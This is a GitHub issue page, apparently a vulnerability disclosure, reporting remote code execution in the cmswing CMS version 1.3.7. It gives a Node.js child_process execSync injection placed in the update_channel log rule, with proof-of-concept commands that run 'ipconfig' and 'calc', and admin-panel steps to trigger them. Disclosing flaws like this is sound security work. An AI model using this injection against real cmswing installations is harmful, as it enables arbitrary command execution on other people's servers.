We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[user|console.log(require('child_process').execSync('ipconfig').toString('utf-8'))]
[user|console.log(require('child_process').execSync('calc').toString('utf-8'))]
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Find a RCE vulnerability in cmswing project version 1.3.7,Details can be found in the analysis below.
Local Test
1.Enter the background of the system, select update_channel module,then edit it.
2.Change log rule
[user|console.log(require('child_process').execSync('ipconfig').toString('utf-8'))]
or[user|console.log(require('child_process').execSync('calc').toString('utf-8'))]
3.Enter [System settings] - [Navigation settings], change a navigation .
4.Change anything, then save it. We can find that our code is executed
5. Get IP and open calc.
The text was updated successfully, but these errors were encountered: